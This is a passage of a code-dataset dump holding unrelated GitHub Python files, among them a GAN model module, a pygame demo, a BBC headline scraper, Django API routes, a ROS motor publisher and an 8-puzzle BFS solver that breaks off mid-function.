self.builder.build_loss_fn(self.config)\n\n # build hooks\n self.forward_hook = self.builder.build_forward_hook(self.config)\n self.post_forward_hook = self.builder.build_post_forward_hook(self.config)\n\n # build optimizer\n if 'use_custom_params' in self.config.optimizer and self.config.optimizer.use_custom_params:\n get_optim_param_fn = self.builder.build_optimizer_param_fn(self.config)\n optimizer_parameters = get_optim_param_fn(list(self.model.named_parameters()))\n else:\n optimizer_parameters = self.model.parameters()\n\n for d in self.dataloaders:\n is_train = d['mode']\n \n if is_train:\n self.train_dataloader = d['dataloader']\n else:\n self.val_dataloader = d['dataloader']\n \n self.total_steps = int(len(self.train_dataloader.dataset) / self.config.train.batch_size * self.config.train.num_epochs)\n self.optimizer = self.builder.build_optimizer(self.config, params=optimizer_parameters, total_steps=self.total_steps)\n\n if self.use_accelerator:\n self.model, self.optimizer, self.dataloaders[0]['dataloader'], self.dataloaders[1]['dataloader'] = self.accelerator.prepare(\n self.model, self.optimizer, self.dataloaders[0]['dataloader'], self.dataloaders[1]['dataloader'])\n\n\n def run(self): \n last_epoch, step, last_accuracy = -1, -1, None \n\n if self.config.train.continue_from_last_checkpoint:\n # load checkpoint\n ckpt = self.cm.latest()\n if ckpt is not None:\n last_epoch, step, last_accuracy = self.cm.load(self.model, self.optimizer, ckpt)\n\n # build scheduler\n self.scheduler = self.builder.build_scheduler(\n self.config, optimizer=self.optimizer, last_epoch=last_epoch, total_steps=self.total_steps)\n\n # train loop\n best_score = self.train(last_epoch=last_epoch, last_accuracy=last_accuracy)\n 
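# best validation score across all inline evaluations, as tracked by the early stopper\n 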
return best_score\n","repo_name":"UoA-CARES/BuilT","sub_path":"built/trainer_base.py","file_name":"trainer_base.py","file_ext":"py","file_size_in_byte":18964,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70096159528","text":"# importing pygame\nimport pygame\n\n# initialize pygame modules\npygame.init()\n\n# define background color\nbgOrange = (255, 165, 0)\nbgBlue = (0, 0, 205)\n\n# define screen settings\nsize = (400, 400)\nscreen = pygame.display.set_mode(size, pygame.FULLSCREEN)\npygame.mouse.set_visible(False)\n\n# define main loop parameters and start the main loop\nFPS = 60 # frames per second (FPS)\nclock = pygame.time.Clock() # create pygame clock instance\nrunning = True # boolean value to control main loop\n\n# start main loop\nwhile running:\n\n # limiting the while loop to FPS (60 times per second)\n clock.tick(FPS)\n # fill screen with orange\n screen.fill(bgOrange)\n # draw everything to foreground for 3 seconds\n pygame.display.flip()\n pygame.time.wait(3000)\n # change screen color to blue\n screen.fill(bgBlue)\n # draw everything again\n pygame.display.flip()\n # wait for another 4.5 seconds then end the program\n pygame.time.wait(4500)\n # program ran for 7.5 seconds in total, so now let's exit\n running = False\n\n# quit program\npygame.quit()\n","repo_name":"imarevic/psy_python_course","sub_path":"labsolutions/L6_ex1_solution.py","file_name":"L6_ex1_solution.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"36362374974","text":"\"\"\"\nDefine three arrays of 20 integers each, named numbers, squares and cubes.\nFill the numbers array with random values between 0 and 100.\nThe squares array must store the squares of the values held in the numbers array.\nThe cubes array must store the cubes of the values held in numbers.\nThen print the contents of the three arrays laid out in three columns.\n\"\"\"\nimport random\n\nLEN_ARRAY = 20\nMIN_NUMBER = 0\nMAX_NUMBER = 100\n\nnumbers = [random.randint(MIN_NUMBER, MAX_NUMBER) for _ in range(LEN_ARRAY)]\nsquares = [n ** 2 for n in numbers]\ncubes = [n ** 3 for n in numbers]\n\nfor i in range(LEN_ARRAY):\n print(f\"{numbers[i]:3} {squares[i]:5} {cubes[i]:7}\")","repo_name":"rdelcastillo/DAW-Python","sub_path":"ej03arrays/0_unidimensionales/uni_ej03.py","file_name":"uni_ej03.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"70549071529","text":"import json\n\nfrom Fetcher import Fetcher\nfrom MatchupRandomizer import MatchupRandomizer\n\nparameter_keys = ['n_cycles', 'current_season', 'current_cycle']\n\ndef get_response(statusCode=200, body='', message=''):\n return {\n 'statusCode': statusCode,\n 'headers': {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(dict(data=body, message=message))\n }\n\ndef handler(event, context):\n try:\n body = json.loads(event['body'])\n\n error_message = ''\n\n # build a string of errors if keys n_cycles, current_season, current_cycle are not in body or type is not int\n for key in parameter_keys:\n if key not in body or not isinstance(body[key], int):\n error_message += f'Key \"{key}\" missing or is not of type int.\\n'\n \n if error_message != '':\n return get_response(400, message=error_message)\n\n # parameters\n n_cycles = 
body['n_cycles']\n current_season = body['current_season']\n current_cycle = body['current_cycle']\n\n fetcher = Fetcher(\n current_season=current_season,\n n_cycles=n_cycles\n )\n\n data_by_tiers_season_cycle, data_by_matchups_season_cycle = fetcher.fetch_data()\n\n matchupRandomizer = MatchupRandomizer(\n data_by_matchups_season_cycle=data_by_matchups_season_cycle,\n data_by_tiers_season_cycle=data_by_tiers_season_cycle,\n current_season=current_season,\n current_cycle=current_cycle\n )\n\n matchups = matchupRandomizer.get_matchups()\n except Exception as e:\n print(e)\n\n return get_response(statusCode=500, message=str(e))\n\n return get_response(body=matchups)","repo_name":"vadManuel/dash-league-randomizer","sub_path":"back/DashLeagueFetcher/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44252419245","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom .my_utils import display_progress, display_results\n\n\nclass UnGAN(nn.Module):\n\n def __init__(self,\n generator,\n discriminator,\n classifier,\n gen_optimizer,\n dsc_optimizer,\n cls_optimizer,\n adv_loss,\n cls_loss,\n num_classes=10,\n display_step=1):\n\n super().__init__()\n self.gen = generator\n self.dsc = discriminator\n self.cls = classifier\n\n self.gen_opt = gen_optimizer\n self.dsc_opt = dsc_optimizer\n self.cls_opt = cls_optimizer\n self.adversarial_criterion = adv_loss\n self.cls_criterion = cls_loss\n\n self.display_step = display_step\n self.num_classes = num_classes\n\n def dsc_step(self, real_images, conditions):\n self.gen.eval()\n self.dsc.train()\n self.dsc.zero_grad()\n bs = real_images.size(0)\n\n # train discriminator on real\n real_labels = torch.ones(bs, 1).type_as(real_images)\n real_logits = self.dsc(real_images)\n D_real_loss = self.adversarial_criterion(real_logits, real_labels)\n\n # train discriminator on fake\n fake_labels = torch.zeros(bs, 1).type_as(real_images)\n fake_images = self.gen(conditions)\n fake_logits = self.dsc(fake_images)\n D_fake_loss = self.adversarial_criterion(fake_logits, fake_labels)\n\n # gradient backprop & optimize ONLY self.dsc's parameters\n D_loss = D_real_loss + D_fake_loss\n D_loss.backward()\n self.dsc_opt.step()\n\n # return D_loss.data.item(), D_fake_loss.data.item(), D_real_loss.data.item()\n return D_loss.data.item()\n\n def gen_step(self, conditions):\n self.dsc.eval()\n self.gen.train()\n self.gen.zero_grad()\n bs = conditions.size(0)\n\n # train generator to fool discriminator\n fake_labels = torch.ones(bs, 1).cuda()\n fake_images = self.gen(conditions)\n fake_logits = self.dsc(fake_images)\n G_loss = self.adversarial_criterion(fake_logits, fake_labels)\n\n # gradient backprop & optimize ONLY self.gen's parameters\n G_loss.backward()\n self.gen_opt.step()\n\n return G_loss.data.item()\n\n def cls_step(self, conditions):\n self.gen.eval()\n # self.gen.train()\n # self.gen.zero_grad()\n self.cls.train()\n self.cls.zero_grad()\n\n # train classifier to recover the conditioning label from generated images\n fake_images = self.gen(conditions, drop=True)\n fake_predicted_cls = self.cls(fake_images)\n C_loss = self.cls_criterion(fake_predicted_cls, conditions)\n C_loss.backward()\n self.cls_opt.step()\n # self.gen_opt.step()\n\n return C_loss.data.item()\n\n def get_acc(self, conditions):\n self.gen.eval()\n self.cls.eval()\n bs = conditions.size(0)\n # check 
how well the classifier recovers labels from generated images\n fake_images = self.gen(conditions)\n fake_predicted_cls = self.cls(fake_images)\n acc = torch.eq(fake_predicted_cls.argmax(dim=-1), conditions).sum() / bs\n return acc.item()\n\n def fit(self, dataloader, n_epoch, device, log_dir, logger):\n # Init\n writer = SummaryWriter(f'{log_dir}/tensorboard')\n n_iters = 0\n # Train\n figs = []\n for epoch in range(1, n_epoch + 1):\n for batch_index, (real_images, _) in enumerate(dataloader):\n real_images = real_images.to(device)\n class_labels = torch.randint(self.num_classes, size=[real_images.size(0)]).to(device)\n\n loss_d = self.dsc_step(real_images, class_labels)\n loss_g = self.gen_step(class_labels)\n writer.add_scalars('adv_loss', {'loss_d': loss_d, 'loss_g': loss_g}, n_iters)\n\n if batch_index % 10 == 0:\n loss_c = self.cls_step(class_labels.to(device))\n writer.add_scalar('cls_loss', loss_c, n_iters)\n acc_c = self.get_acc(class_labels)\n writer.add_scalar('cls_acc', acc_c, n_iters)\n n_iters += 1\n logger.info(f'[{epoch:03d}/{n_epoch}]: loss_d: {loss_d:.3f}, loss_g: {loss_g:.3f}, acc_c: {acc_c:.2%}')\n\n if epoch % self.display_step == 0:\n fake_images = self.gen(class_labels.to(device))\n fig = display_progress(epoch, class_labels[:4], fake_images[:4], real_images[:4],\n save_fig=f'{log_dir}/figures')\n figs.append(fig)\n torch.save(self.gen.state_dict(), f'{log_dir}/checkpoints/G_epoch{epoch}.pth')\n torch.save(self.dsc.state_dict(), f'{log_dir}/checkpoints/D_epoch{epoch}.pth')\n torch.save(self.cls.state_dict(), f'{log_dir}/checkpoints/C_epoch{epoch}.pth')\n\n # Save results\n writer.add_figure('figures', figs)\n fake_images = self.gen(class_labels[:64].to(device))\n display_results(class_labels[:64], fake_images, title='Generated Conditional Images',\n save_fig=f'{log_dir}/figures/gen_result.jpg')\n\n pred = self.cls(real_images[:64].to(device)).argmax(-1)\n display_results(pred, real_images[:64], title='Classified Test Images',\n save_fig=f'{log_dir}/figures/cls_result.jpg')\n\n\nclass DownSampleConv(nn.Module):\n\n def __init__(self, in_channels, out_channels, kernel=4, strides=2, padding=1, activation=True, batchnorm=True):\n \"\"\"\n Paper details:\n - C64-C128-C256-C512-C512-C512-C512-C512\n - All convolutions are 4×4 spatial filters applied with stride 2\n - Convolutions in the encoder downsample by a factor of 2\n \"\"\"\n super().__init__()\n self.activation = activation\n self.batchnorm = batchnorm\n\n self.conv = nn.Conv2d(in_channels, out_channels, kernel, strides, padding)\n\n if batchnorm:\n self.bn = nn.BatchNorm2d(out_channels)\n\n if activation:\n self.act = nn.LeakyReLU(0.2)\n\n def forward(self, x):\n x = self.conv(x)\n if self.batchnorm:\n x = self.bn(x)\n if self.activation:\n x = self.act(x)\n return x\n\n\nclass UpSampleConv(nn.Module):\n\n def __init__(self, in_channels, out_channels, kernel=4, strides=2, padding=1, activation=True, batchnorm=True,\n dropout=False):\n super().__init__()\n self.activation = activation\n self.batchnorm = batchnorm\n self.dropout = dropout\n\n self.deconv = nn.ConvTranspose2d(in_channels, out_channels, kernel, strides, padding)\n\n if batchnorm:\n self.bn = nn.BatchNorm2d(out_channels)\n\n if activation:\n self.act = nn.ReLU(True)\n\n if dropout:\n self.drop = nn.Dropout2d(0.5)\n\n def forward(self, x):\n x = self.deconv(x)\n if self.batchnorm:\n x = self.bn(x)\n if self.activation:\n x = self.act(x)\n\n if self.dropout:\n x = self.drop(x)\n return x\n\n\nclass UnetGenerator(nn.Module):\n\n def __init__(self, in_channels, out_channels):\n super().__init__()\n # encoder/downsample 
convs\n self.encoders = [DownSampleConv(in_channels, 64, batchnorm=False), # bs x 128 x 64 x 64\n DownSampleConv(64, 128), # bs x 256 x 32 x 32\n DownSampleConv(128, 256), # bs x 512 x 16 x 16\n DownSampleConv(256, 512), # bs x 512 x 8 x 8\n DownSampleConv(512, 512), # bs x 512 x 4 x 4\n DownSampleConv(512, 512), # bs x 512 x 2 x 2\n DownSampleConv(512, 512, batchnorm=False), # bs x 512 x 1 x 1\n ]\n\n # decoder/upsample convs\n self.decoders = [UpSampleConv(512, 512, dropout=True), # bs x 512 x 2 x 2\n UpSampleConv(1024, 512, dropout=True), # bs x 512 x 4 x 4\n UpSampleConv(1024, 512, dropout=True), # bs x 512 x 8 x 8\n UpSampleConv(1024, 256), # bs x 512 x 16 x 16\n UpSampleConv(512, 128), # bs x 256 x 32 x 32\n UpSampleConv(256, 64), # bs x 128 x 64 x 64\n ]\n self.decoder_channels = [512, 512, 512, 512, 256, 128, 64]\n self.final_conv = nn.ConvTranspose2d(64, out_channels, kernel_size=4, stride=2, padding=1)\n self.tanh = nn.Tanh()\n\n self.encoders = nn.ModuleList(self.encoders)\n self.decoders = nn.ModuleList(self.decoders)\n\n def forward(self, x):\n skips_cons = []\n for encoder in self.encoders:\n x = encoder(x)\n\n skips_cons.append(x)\n\n skips_cons = list(reversed(skips_cons[:-1]))\n decoders = self.decoders[:-1]\n\n for decoder, skip in zip(decoders, skips_cons):\n x = decoder(x)\n # print(x.shape, skip.shape)\n x = torch.cat((x, skip), axis=1)\n\n x = self.decoders[-1](x)\n # print(x.shape)\n x = self.final_conv(x)\n return self.tanh(x)\n\n\n# class CA_NET(nn.Module):\n# # some code is modified from vae examples\n# # (https://github.com/pytorch/examples/blob/master/vae/main.py)\n# def __init__(self):\n# super(CA_NET, self).__init__()\n# self.t_dim = 100\n# self.c_dim = 100\n# self.fc = nn.Linear(self.t_dim, self.c_dim * 2, bias=True)\n# self.relu = nn.ReLU()\n#\n# def encode(self, text_embedding):\n# x = self.relu(self.fc(text_embedding))\n# mu = x[:, :self.c_dim]\n# logvar = x[:, self.c_dim:]\n# return mu, logvar\n#\n# def reparametrize(self, mu, logvar):\n# std = logvar.mul(0.5).exp_()\n# eps = torch.cuda.FloatTensor(std.size()).normal_()\n# eps = Variable(eps)\n# return eps.mul(std).add_(mu)\n#\n# def forward(self, text_embedding):\n# mu, logvar = self.encode(text_embedding)\n# c_code = self.reparametrize(mu, logvar)\n# return c_code, mu, logvar\n\nclass UpGenerator(nn.Module):\n\n @staticmethod\n def conv3x3(in_planes, out_planes, stride=1):\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n def upBlock(self, in_planes, out_planes):\n block = nn.Sequential(nn.Upsample(scale_factor=2, mode='nearest'), self.conv3x3(in_planes, out_planes),\n nn.InstanceNorm2d(out_planes), nn.LeakyReLU(0.2, True))\n return block\n\n def __init__(self, num_classes, noise_channels, embedding_channels, image_shape, latent_channels=128):\n super().__init__()\n self.image_shape = image_shape\n self.num_classes = num_classes\n self.noise_channels = noise_channels\n self.latent_channels = latent_channels\n image_channels = image_shape[0]\n\n self.embedding = nn.Embedding(num_classes, embedding_channels)\n self.fc = nn.Linear(embedding_channels + noise_channels, latent_channels * 4 * 4) # 128 x 4 x 4\n # self.norm = nn.InstanceNorm1d(latent_channels * 4 * 4)\n\n self.upsample1 = self.upBlock(latent_channels, latent_channels // 2) # 64 x 8 x 8\n self.upsample2 = self.upBlock(latent_channels // 2, latent_channels // 4) # 32 x 16 x 16\n self.upsample3 = self.upBlock(latent_channels // 4, latent_channels // 8) # 16 x 32 x 32\n self.upsample4 = 
self.upBlock(latent_channels // 8, latent_channels // 16) # 8 x 64 x 64\n self.img = nn.Sequential(self.conv3x3(latent_channels // 16, image_channels), nn.Tanh()) # 3 x 64 x 64\n\n def forward(self, x):\n x = self.embedding(x)\n noises = torch.randn(x.size(0), self.noise_channels).type_as(x)\n x = torch.cat((x, noises), dim=1)\n x = F.leaky_relu(self.fc(x), 0.2)\n x = x.view(-1, self.latent_channels, 4, 4)\n\n x = self.upsample1(x)\n x = self.upsample2(x)\n x = self.upsample3(x)\n x = self.upsample4(x)\n fake_img = self.img(x)\n return fake_img\n\n\n# class PatchGAN(nn.Module):\n#\n# def __init__(self, input_channels):\n# super().__init__()\n# self.d1 = DownSampleConv(input_channels, 64, batchnorm=False)\n# self.d2 = DownSampleConv(64, 128)\n# self.d3 = DownSampleConv(128, 256)\n# self.d4 = DownSampleConv(256, 512)\n# self.final = nn.Conv2d(512, 1, kernel_size=1)\n#\n# def forward(self, x):\n# x = self.d1(x)\n# x = self.d2(x)\n# x = self.d3(x)\n# x = self.d4(x)\n# x = self.final(x)\n# return x\n\n\nclass DownClassifier(nn.Module):\n def __init__(self, n_classes, image_shape):\n super().__init__()\n image_channels = image_shape[0]\n self.d1 = DownSampleConv(image_channels, 64, batchnorm=False)\n self.d2 = DownSampleConv(64, 128)\n self.d3 = DownSampleConv(128, 256)\n self.d4 = DownSampleConv(256, 256)\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(256, n_classes)\n\n def forward(self, x):\n x = self.d1(x)\n x = self.d2(x)\n x = self.d3(x)\n x = self.d4(x)\n x = self.pool(x).flatten(start_dim=1)\n x = self.fc(x)\n return x\n\n\nclass DownDiscriminator(nn.Module):\n def __init__(self, image_shape):\n super().__init__()\n image_channels = image_shape[0]\n self.d1 = DownSampleConv(image_channels, 64, batchnorm=False)\n self.d2 = DownSampleConv(64, 128)\n self.d3 = DownSampleConv(128, 256)\n self.d4 = DownSampleConv(256, 256)\n self.pool = nn.AdaptiveAvgPool2d((1, 1))\n self.fc = nn.Linear(256, 1)\n\n def forward(self, x):\n x = self.d1(x)\n x = self.d2(x)\n x = self.d3(x)\n x = self.d4(x)\n x = self.pool(x).flatten(start_dim=1)\n x = self.fc(x)\n return x\n\n\nclass FcGenerator(nn.Module):\n\n def __init__(self, num_embeddings=10, embedding_channels=10, noise_channels=224, image_shape=(1, 28, 28)):\n super().__init__()\n self.image_shape = image_shape\n self.embedding_channels = embedding_channels\n self.noise_channels = noise_channels\n if embedding_channels > 0:\n self.embedding = nn.Embedding(num_embeddings, embedding_channels)\n # normalized_means = [(2*i/(num_embeddings-1)) - 1 for i in range(num_embeddings)]\n # self.distributions = [torch.distributions.Normal(torch.tensor([mean]), torch.tensor([1.0])) for mean in normalized_means]\n\n image_dim = np.prod(image_shape).item()\n self.fc1 = nn.Linear(embedding_channels + noise_channels, 256)\n self.fc2 = nn.Linear(self.fc1.out_features, self.fc1.out_features * 2)\n self.fc3 = nn.Linear(self.fc2.out_features, self.fc2.out_features * 2)\n self.fc4 = nn.Linear(self.fc3.out_features, image_dim)\n self.drop = nn.Dropout(0.5)\n\n def forward(self, x, drop=False):\n if self.embedding_channels > 0:\n x = self.embedding(x)\n noise = torch.randn(x.size(0), self.noise_channels).type_as(x)\n x = torch.cat([x, noise], dim=-1)\n else:\n x = torch.randn(x.size(0), self.noise_channels, device=x.device, dtype=torch.float)\n noises = [torch.normal(mean=1 * x.float(), std=torch.ones(x.size(0)).cuda()) for k in\n range(self.noise_channels)]\n # noises = [self.distributions[d].sample((self.noise_channels,)).cuda() for d in x]\n x = 
torch.stack(noises).squeeze()\n x = F.leaky_relu(self.fc1(x), 0.2)\n x = F.leaky_relu(self.fc2(x), 0.2)\n x = F.leaky_relu(self.fc3(x), 0.2)\n x = torch.tanh(self.fc4(x))\n if drop:\n x = self.drop(x)\n return x.view(-1, *self.image_shape)\n\n\nclass FcDiscriminator(nn.Module):\n\n def __init__(self, image_shape=(1, 28, 28)):\n super().__init__()\n image_dim = np.prod(image_shape).item()\n self.fc1 = nn.Linear(image_dim, 1024)\n self.fc2 = nn.Linear(self.fc1.out_features, self.fc1.out_features // 2)\n self.fc3 = nn.Linear(self.fc2.out_features, self.fc2.out_features // 2)\n self.fc4 = nn.Linear(self.fc3.out_features, 1)\n\n # forward method\n def forward(self, x):\n x = x.flatten(start_dim=1)\n x = F.leaky_relu(self.fc1(x), 0.2)\n x = F.dropout(x, 0.3)\n x = F.leaky_relu(self.fc2(x), 0.2)\n x = F.dropout(x, 0.3)\n x = F.leaky_relu(self.fc3(x), 0.2)\n x = F.dropout(x, 0.3)\n return self.fc4(x)\n\n\nclass FcClassifier(FcDiscriminator):\n\n def __init__(self, num_classes, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fc4 = nn.Linear(self.fc3.out_features, num_classes)\n","repo_name":"makecent/UnGAN","sub_path":"my_codes/my_models.py","file_name":"my_models.py","file_ext":"py","file_size_in_byte":16879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72546394087","text":"#1.Create the Screen\n\nimport pygame,sys\n\npygame.init()\n\nscreen = pygame.display.set_mode((810,630))\n\npygame.display.set_caption('Snake game by Nhóm 1')\n\nBLACK = (0,0,0)\n\nRunning = True\nwhile Running:\n screen.fill(BLACK)\n\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n Running = False\n\n pygame.display.flip()\n\npygame.quit()\n\n\n\n\n\n\n\n\n\n","repo_name":"Chi68P1/Lap_trinh_python","sub_path":"Snake_game/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12141442710","text":"import os\nfrom pprint import pformat\nfrom aiohttp import ClientSession\nfrom aiohttp import web\nfrom bs4 import BeautifulSoup\nfrom aiohttp.web_request import Request\nimport trafaret as t\n\nURL = 'https://www.bbc.com/'\nTEG = 'a'\nCLASS = \"gs-c-promo-heading\"\n\n\nasync def fetch(session: ClientSession, url: str) -> str:\n async with session.get(url) as response:\n return await response.text()\n\n\nroutes = web.RouteTableDef()\n\n\n@routes.get('/')\nasync def get_chapters(request: Request):\n async with ClientSession() as session:\n tmp = t.Dict({'limit': t.String})\n # tmp = t.Dict({t.String: t.})\n params = {item[0]: item[1] for item in request.query.items()}\n converter = t.Dict({\n t.Key('chapter', default= 'news') >> 'chapter': t.String,\n t.Key('limit' , default= 1000) >> 'limit': t.Int,})\n # tmp.check(params)\n\n print(converter)\n print(params)\n\n\n\n try:\n params = converter.check(params)\n\n\n\n #except (KeyError, ValueError) as e:\n except (t.DataError) as e:\n return web.Response(text=str(t.extract_error(converter,params)))\n chapter = params['chapter']\n end = int(params['limit'])\n html = await fetch(session, URL + chapter)\n bs_obj = BeautifulSoup(html, features=\"html.parser\")\n\n tmp1 = bs_obj.findAll(TEG, {CLASS})\n news = [{'title': item.get_text(), 'URL': item['href']} for (i, item) in enumerate(tmp1) if i < end]\n\n js = {'chapter': chapter,\n 'news': news}\n\n return web.Response(text=pformat(js))\n\n\napp = web.Application()\napp.add_routes(routes)\nweb.run_app(app, host='0.0.0.0', 
port=os.environ.get('PORT', 5000))\n","repo_name":"as1mple/BBC","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36307458560","text":"from django.conf.urls import url\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\nfrom rest_framework import permissions, routers\n\nfrom .views import ClientViewSet, EmpresaViewSet, LanceViewSet, OfertaViewSet\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Snippets API\",\n default_version='v1',\n description=\"API\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\napi_docs_urls = [\n url(\n r'^api/swagger(?P\\.json|\\.yaml)$',\n schema_view.without_ui(cache_timeout=0),\n name='schema-json'\n ),\n url(\n r'^api/swagger/$',\n schema_view.with_ui('swagger', cache_timeout=0),\n name='schema-swagger-ui'\n ),\n url(\n r'^api/redoc/$',\n schema_view.with_ui('redoc', cache_timeout=0),\n name='schema-redoc'\n ),\n]\n\n\ncore_routes = routers.DefaultRouter()\n\ncore_routes.register('clientes', ClientViewSet)\ncore_routes.register('empresas', EmpresaViewSet)\ncore_routes.register('lances', LanceViewSet)\ncore_routes.register('ofertas', OfertaViewSet)\n","repo_name":"danilodcn/teste_W_Technology","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8504213006","text":"#!/usr/bin/python\nimport rospy\nimport numpy as np\nimport math\nfrom maxon_epos_msgs.msg import MotorState\n\nTARGET_MOTOR_STATE_MSG = '/maxon_brinup/rear_brake/set_state'\nTARGET_POSITION = 0.0\nCONST_RPM = 3500\n\ndef step_input():\n pub = rospy.Publisher(TARGET_MOTOR_STATE_MSG, MotorState, queue_size=3)\n rospy.init_node('sample_step_input',anonymous=True)\n rate=rospy.Rate(10) #10Hz\n\n msg = MotorState()\n msg.position = math.radians(TARGET_POSITION)\n msg.velocity = CONST_RPM\n\n pub.publish(msg) # step input\n\nif __name__ == '__main__':\n try:\n step_input()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"hayashi-lab-soma/soma_pkg","sub_path":"soma_atv_driver/scripts/sample_step_input.py","file_name":"sample_step_input.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36018106017","text":"import json\r\n\r\nif __name__ == '__main__':\r\n try:\r\n with open('myInput.json', 'r') as f:\r\n data = json.loads(f.read())\r\n\r\n output = ','.join([*data[0]])\r\n for obj in data:\r\n output += f'\\n{obj[\"Name\"]},{obj[\"BirthYear\"]},{obj[\"Team\"]}'\r\n\r\n with open('myOutput.csv', 'w') as f:\r\n f.write(output)\r\n except Exception as ex:\r\n print(f'Error: {str(ex)}')","repo_name":"mydevground/ConvertJSONtoCSVusingPython","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73329800487","text":"# Importing the required libraries\nimport sys\nimport queue\nfrom datetime import datetime\nfrom queue import Queue\n\n# BFS algorithm\ndef bfs(start, goal):\n start = tuple(map(tuple, start))\n goal = tuple(map(tuple, goal))\n 
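# FIFO fringe plus bookkeeping: parent links rebuild the solution path; depth and path cost are tracked per state\n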
    queue = Queue()\n    queue.put(start)\n    visited = set()\n    parent = {}\n    depth = {start: 0}\n    cost = {start: 0}\n    max_fringe_size = 1\n    result = []\n    \n    # Keep expanding nodes while the fringe queue is non-empty\n    while not queue.empty():\n        node = queue.get()\n        visited.add(node) # adding the node into the visited set \n        \n        # check whether the current node matches the goal state\n        if node == goal:\n            path = []\n            while node in parent:\n                path.append(node)\n                node = parent[node]\n            path.append(start)\n            path.reverse()\n            print(f\"Nodes Popped: {len(visited)}\")\n            print(f\"Nodes Expanded: {len(visited)-1}\")\n            print(f\"Nodes Generated: {len(parent)}\")\n            print(f\"Max Fringe Size: {max_fringe_size}\")\n            print((f\"Solution Found at depth {depth[goal]} with cost of {cost[goal]}.\"))\n            print('Steps:')\n            for step in result:\n                move_cost, move_name = step[1], step[2]\n                print(f\"\\tMove {move_cost} {move_name}\")\n            print(\"Result Found Successfully!\")\n            file_name_bfs = f'bfs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt'\n            file_bfs = open(file_name_bfs, \"a\")\n            file_bfs.write(f\"\\tNodes Popped: {len(visited)}\\n\")\n            file_bfs.write(f\"\\tNodes Expanded: {len(visited)-1}\\n\")\n            file_bfs.write(f\"\\tNodes Generated: {len(parent)}\\n\")\n            file_bfs.write(f\"\\tMax Fringe Size: {max_fringe_size}\\n\")\n            file_bfs.write((f\"\\tSolution Found at depth {depth[goal]} with cost of {cost[goal]}.\"))\n            with open(file_name_bfs, 'r+') as file:\n                content = file.read()\n                file.seek(0, 0)\n                file.write(\"Method_selected: BFS \\nRunning BFS Algorithm \\n\" + content)\n            return None\n        \n        # enqueue each generated successor that has not been visited yet\n        for move in moves_bfs(node, visited):\n            if move[0] not in visited:\n                queue.put(move[0])\n                visited.add(move[0])\n                parent[move[0]] = node\n                depth[move[0]] = depth[node] + 1\n                cost[move[0]] = cost[node] + move[1]\n            max_fringe_size = max(max_fringe_size, queue.qsize())\n            result.append(move)\n    print(\"No solution found.\")\n    \n    \ndef moves_bfs(node, visited):\n    moves = []\n    with open(f'bfs_trace_file_{datetime.now().strftime(\"%d_%m_%Y_%H_%M\")}.txt', 'a') as file:\n        blank_row, blank_col = get_blank_pos(node)\n        # Based on the blank tile's row and column, the loop below identifies whether 0 can move up, down, left or right\n        file.write(f\"Closed Set: {visited}\\n\")\n        for dr, dc, move_name in [(-1, 0, \"Up\"), (1, 0, \"Down\"), (0, -1, \"Left\"), (0, 1, \"Right\")]:\n            new_row, new_col = blank_row + dr, blank_col + dc\n            if 0 <= new_row < len(node) and 0 <= new_col < len(node[0]):\n                new_node = swap_positions(node, blank_row, blank_col, new_row, new_col)\n                move_cost = node[new_row][new_col]\n                moves.append((new_node, move_cost, move_name))\n        file.write(f\"Fringe_steps: {moves}\\n\")\n    return moves\n\n# This function identifies the position of 0 in the puzzle and returns its row and column\ndef get_blank_pos(node):\n    for r, row in enumerate(node):\n        for c, val in enumerate(row):\n            if val == 0:\n                return r, c\n    raise ValueError(\"node is not valid because there is no blank tile(0) found\")\n\n# This function swaps '0' with the tile at the target position.\ndef swap_positions(node, r1, c1, r2, c2):\n    node = [list(row) for row in node]\n    node[r1][c1], node[r2][c2] = node[r2][c2], node[r1][c1]\n    return tuple(map(tuple, node))\n# Getting all the successors of the current node\ndef get_successors_ucs(state, visited):\n    successors = []\n    blank_pos = state.index(0)\n    blank_row = blank_pos // 3\n    blank_col = blank_pos % 3\n
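    # Log the closed set and the generated successors to a timestamped trace file\n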
